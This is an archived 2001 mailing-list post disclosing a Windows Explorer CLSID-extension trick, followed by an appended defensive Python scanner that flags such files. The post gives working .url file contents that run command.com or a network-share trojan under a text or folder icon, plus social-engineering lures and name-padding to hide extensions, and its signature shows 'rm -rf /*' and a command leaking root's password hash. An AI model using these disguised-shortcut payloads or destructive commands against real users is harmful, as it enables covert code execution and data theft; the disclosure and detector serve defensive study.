Re: Double clicking on innocent looking files may be dangerous

From: [Co]Proc (mailtoat_private)
Date: Wed Apr 25 2001 - 00:19:45 PDT


    -----BEGIN PGP SIGNED MESSAGE-----
    
    There is a possibility to run a program (e.g. a trojan)
    without confirmation and even without suspicion...
    
    Exploring the registry I've found 2 interesting
    CLSIDs:
    the first one is the CLSID of the .lnk file
    .lnk file: {00021401-0000-0000-C000-000000000046}
    I wouldn't stop on this 'cause it's a binary
    file and if you have certain utils, you can try
    to find something useful out of this.
    I found a much easier way to use the CLSID bug,
    and here it is, the CLSID of the .url file...
    .url file: {FBF23B40-E3F0-101B-8488-00AA003E56F8}
    If someone creates a file, e.g.
    
    ==== CreditCard.txt.{FBF23B40-E3F0-101B-8488-00AA003E56F8} ====
    [InternetShortcut]
    URL=file://c:/command.com
    
    ========================= END OF FILE =========================
    
    Double-clicking on this file in Explorer will launch the
    MS-DOS Prompt. But... in Explorer that file will have the
    icon of a .url file.
    There is a way to fix it, and it can be done by adding some
    lines to the file. Now the file looks like this:
    
    ==== CreditCard.txt.{FBF23B40-E3F0-101B-8488-00AA003E56F8} ====
    [InternetShortcut]
    URL=file://c:/command.com
    IconIndex=-152
    IconFile=shell32.dll
    
    ========================= END OF FILE =========================
    
    Now the file in Explorer will be shown with the normal
    .txt-file icon (you can change IconIndex and/or IconFile
    for another icon), and when someone clicks on it he thinks
    it's a normal text file, but as the result of double-clicking
    the MS-DOS Prompt will pop up, without any confirmation (!!!).
    
    But that's not all... If the hacker is on the same network as the
    possible victim (or he has access to a computer on the
    victim's network), there is a possibility to run the hacker's
    program directly from the network. For this purpose
    he can use the following file:
    
    ==== master.passwd.txt.{FBF23B40-E3F0-101B-8488-00AA003E56F8} ====
    [InternetShortcut]
    URL=file://ourcomp/ourshare/path/to/trojan.exe
    IconIndex=-152
    IconFile=shell32.dll
    
    =========================== END OF FILE ==========================
    
    Where ourcomp is the name of the hacker's computer on the victim's
    network, ourshare is the name of a shared folder on that computer,
    and as you can guess path/to is the path to trojan.exe on that share.
    And after double-clicking, guess what MS Explorer will do???
    CORRECT!!! It'll run trojan.exe WITHOUT ANY CONFIRMATION!!!!
    
    Now if the hacker is smart enough to write a trojan program that does
    some crazy things, creates a file master.passwd.txt (without CLSID)
    on the victim's computer and opens it with Notepad, the victim won't even
    suspect the trick ;-)
    
    Tested on Win98, IE5.0.
    I don't know how IE would behave if that file were accessed
    from <a href="...">, but I tried it on localhost this way:
    in the IE location bar I typed
    "file://X:/XPL/CLSID/master.passwd.txt.{FBF23B40-E3F0-101B-8488-00AA003E56F8}",
    and... IE executed trojan.exe ;-). From <a href="..."> it didn't
    work.
    
    WORKAROUND
     1. View file properties before opening any innocent-looking files in
        Explorer (not realistic)
     2. Remove from the registry all CLSIDs of .url and .lnk, but this may
        cause the system to work improperly.
     3. Do not use Explorer to open files. You can use Far Manager,
        Windows Commander, etc. as I do.
    
    > Yet while valid the vulnerabilities are not particularly
    > threatening. For the vulnerability to be exploited an attacker must
    > somehow place a file somewhere the user is likely to find it and
    > somehow entice him to "open" it by clicking on it.
    That's why an attacker should name files
       master.passwd.txt.{FBF23B40-E3F0-101B-8488-00AA003E56F8},
    or something like that. But there is an even more dangerous way:
    we can name our file
       passwords.{FBF23B40-E3F0-101B-8488-00AA003E56F8}
    and change its icon to the icon of a Folder, so the victim
    would think she's opening a Folder.
    Then we place the file in our shared folder and somehow
    invite the victim to that share (e.g. to download Document.doc).
    If the victim is curious, she'll notice the folder "passwords",
    and would go to see the passwords ;-)
    
    Here are some scenarios by Elias Levy (aka Aleph One):
    > I can think of a couple of scenarios where this may be possible. The
    > most appealing is one where an attacker has obtained access to a
    > file server used by the user and places a malicious file in the
    > share. If the user finds the file and opens it the attack can
    > leverage his access to the file server into access to the victim's
    > machine.
    >
    > Another scenario may be to use some vulnerability that allows an
    > attacker to create, but not execute or overwrite other files, in a
    > victim's machine. He can place the file on the victim's machine via
    > the vulnerability but must wait for him to open the file.
    >
    > Another scenario may transfer the file into a victim's machine via
    > an email message. The attacker may be able to fool the mail client not
    > to display the full file name of the file, which the victim then
    > saves, and opens. Maybe we can use the trick of padding the file
    > name with spaces between the "txt" and ".{..." parts so that the
    > filename is truncated when displayed to the user.
    And here are some scenarios by me:
    If I know the victim (I mean, I know her e-mail, and I've got at
    least one letter from the victim), then I can check the X-Mailer in
    the headers of the victim's letters. Now, if I'm sure that the victim
    uses The Bat!, then I use this scenario:
       I send an e-mail to the victim with trojan.exe attached.
       It's completely clear that the victim will delete that message, but...
       that file (trojan.exe) will remain on the victim's computer until
       the message is deleted from the Trash folder. And all attachments
       of this type (non-text) are stored in the following folder on the
       victim's machine: C:\Program Files\The Bat!\Mail\Victim's Name\Attach\
       So, now I can use a file with the CLSID extension to run the program
        C:\Program Files\The Bat!\Mail\Victim's Name\Attach\trojan.exe
       on the victim's machine.
    If the victim uses Outlook Express, you can use aleph1's trick with
    spaces between the two extensions. But... Outlook will
    show:
     1. the icon of the file as an Internet Shortcut
     2. all spaces and the CLSID extension when the victim tries to open it.
    The other trick is to place spaces before the entire name of the file;
    in my case the file was named big2.txt.{...CLSID...}, and I
    placed 58 spaces, so Outlook showed it like "big2.txt...".
    I don't think this is a usage of the CLSID bug, 'cause this way
    we can send any .exe file, etc...
    By the way, if there are a lot of spaces before the name of the file,
    Explorer begins to do some crazy things:
     1. It doesn't show the name of the file (spaces)
     2. After selecting the file and switching from Explorer to
        Explorer, it shows the name of the file (e.g. master.passwd.txt) not in the
        selected region, but nearly 30 pixels lower. And then when
        you drag that file, the name will remain in the same place ;-))
    
    I'll try to find out some tricks with .lnk CLSID, so bye for now...
    
    EnJoY !
    
    
    
    with Best regards,
             [Co]Proc,
                  procat_private
    
    brought 2 U by [HtR]team, teamat_private:
      EforeZZ  - eforezzat_private, The LNU, Lviv, Ukraine
      [Co]Proc - procat_private, The KPI, Kiev, Ukraine
    
                    ........................
             ....:::::[ hAck tHe rEaLitY ]:::::....
       ...::::::::::::::::::::::::::::::::::::::::::::...
    _____     __.-- -  -   [HtR] team   -  - --.__     _______
       _ \___/..::::::::::::::::::::::::::::::::..\___/ _
    _____/   \____ the reality can be hacked  ____/   \_______
                  \__   the trouble is to  __/
                     \__  find out HOW? __/
                        \______________/
        ________________/              \____________________
       |$ ./a.out -x 20 |              | [HtR]team          |
       |# rm -rf /*     ||             |    teamat_private ||
       |________________||             | [Co]Proc           ||
         ----------------+             |     coprocat_private ||
                                       | EforeZZ            ||
                                       |    EforeZZat_private ||
                                       |____________________||
                                         --------------------+
    
     [ 25 packets sent, 0 packets received, 100% packet loss ]
    
    # grep root /etc/master.passwd|cut -d: -f2|write root
    
    -----BEGIN PGP SIGNATURE-----
    Version: PGP 6.5i
    
    iQEVAwUBOuZeevKsruSZV1VvAQH5/Qf/YmS/uNrJbfJxPbxAvkMSSq+sy216D8s5
    Uf9A6Dh9RrPjQJw8/hXqwhM/2ZsdtE0R87LhtRr0DBd+4WHoQfK/lXdp++VcBU6N
    x6GKfnYf+vsn8Ei+0YbXqm+oMC7axaYDf2+UI84zUw/uyJ+kKxOrn8ekUKhK/Rvq
    UMOPMYG2qGKyqY/Ue/fDjkH4PcbF9di4a1KlPstn4+7f9tr2YHGkXOJeLnM2cIPF
    MqwSt3BzrzuvF4CB/f2lmRF7T7+bh4f3arXEyNudDLdOYuQlOHOLuTHIYRq4oG0z
    PJnSX/rPQNVo3dmjvgoQu9hXWit6lOedriAsi3sK55eNiBPgLsOQCg==
    =q/Sq
    -----END PGP SIGNATURE-----
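As an added defensive example (not part of the original post or any tool it mentions): a Python scanner that walks a directory and flags the filename pattern the post describes, i.e. a trailing ".{CLSID}" extension that Explorer hides from the display name, with special handling for the two CLSIDs quoted in the post (Internet Shortcut and Shell Link). For Internet Shortcut files it also parses the [InternetShortcut] section and reports where the URL= line points (local file://, a UNC share, or a web URL), whether the target name looks executable, and whether IconFile= is used to override the icon; it separately flags names padded with runs of spaces, the truncation trick discussed in the quoted scenarios. The sample files written by build_sample_dir() are constructed for this example and modelled on the post's own examples; the function and variable names are this example's own.

```python
import configparser
import os
import re
import tempfile
from urllib.parse import urlparse

# CLSIDs quoted in the original post: shell handlers whose ".{CLSID}" suffix
# is stripped from the name Explorer displays.
CLSID_URL = "{FBF23B40-E3F0-101B-8488-00AA003E56F8}"   # Internet Shortcut (.url)
CLSID_LNK = "{00021401-0000-0000-C000-000000000046}"   # Shell Link (.lnk)

# Any trailing ".{GUID}" is worth a look, not only the two above.
CLSID_EXT_RE = re.compile(
    r"\.(\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\})$")

EXEC_SUFFIXES = (".exe", ".com", ".bat", ".cmd", ".pif", ".scr")


def parse_internet_shortcut(path):
    """Return the [InternetShortcut] keys of a .url-style file, or None."""
    parser = configparser.ConfigParser(interpolation=None)
    parser.optionxform = str  # keep key case (URL, IconFile) as written
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            parser.read_file(fh)
    except (configparser.Error, OSError):
        return None
    if not parser.has_section("InternetShortcut"):
        return None
    return dict(parser.items("InternetShortcut"))


def classify_target(url):
    """Classify a shortcut URL: ('local-file'|'unc-share'|'remote-web'|'unknown', is_exec)."""
    parsed = urlparse(url.strip())
    if parsed.scheme != "file":
        return ("remote-web" if parsed.scheme else "unknown", False)
    is_exec = parsed.path.lower().endswith(EXEC_SUFFIXES)
    # file://host/share/... has a real hostname; file://c:/... has a drive letter.
    if parsed.netloc and not re.fullmatch(r"[A-Za-z]:?", parsed.netloc):
        return ("unc-share", is_exec)
    return ("local-file", is_exec)


def scan_filename(name):
    """Reasons a filename alone is suspicious (empty list if none)."""
    reasons = []
    m = CLSID_EXT_RE.search(name)
    if m:
        clsid = m.group(1).upper()
        if clsid == CLSID_URL:
            reasons.append("clsid-extension: Internet Shortcut handler")
        elif clsid == CLSID_LNK:
            reasons.append("clsid-extension: Shell Link handler")
        else:
            reasons.append("clsid-extension: " + clsid)
        visible = name[: m.start()]  # what Explorer would show
        if visible != visible.strip() or "  " in visible:
            reasons.append("padded-name: whitespace pushes the real extension out of view")
    return reasons


def scan_directory(root):
    """Walk root; return sorted (relative name, [reasons]) for suspicious files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            reasons = scan_filename(name)
            full = os.path.join(dirpath, name)
            m = CLSID_EXT_RE.search(name)
            if m and m.group(1).upper() == CLSID_URL:
                section = parse_internet_shortcut(full)
                if section and "URL" in section:
                    kind, is_exec = classify_target(section["URL"])
                    reasons.append("target: " + kind + (" executable" if is_exec else ""))
                    if "IconFile" in section:
                        reasons.append("icon-override: " + section["IconFile"])
            if reasons:
                findings.append((os.path.relpath(full, root), reasons))
    return sorted(findings)


def build_sample_dir():
    """Write constructed sample files (modelled on the post) to a temp dir; return its path."""
    root = tempfile.mkdtemp(prefix="clsid-scan-")
    samples = {
        "CreditCard.txt." + CLSID_URL:
            "[InternetShortcut]\nURL=file://c:/command.com\nIconIndex=-152\nIconFile=shell32.dll\n",
        "master.passwd.txt." + CLSID_URL:
            "[InternetShortcut]\nURL=file://ourcomp/ourshare/path/to/trojan.exe\n",
        "notes.txt      ." + CLSID_URL:   # padded name, harmless web target
            "[InternetShortcut]\nURL=http://example.invalid/\n",
        "readme.txt": "nothing to see here\n",
    }
    for name, body in samples.items():
        with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, why in scan_directory(build_sample_dir()):
        print(repr(rel), "->", "; ".join(why))
```

The scan keys off the filename first, so a .url file renamed to carry the CLSID suffix is reported even when it points somewhere harmless; the target classification then tells an analyst which hits need attention (local or UNC executables with an icon override, as in the post's examples).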
    



    This archive was generated by hypermail 2b30 : Wed Apr 25 2001 - 19:02:28 PDT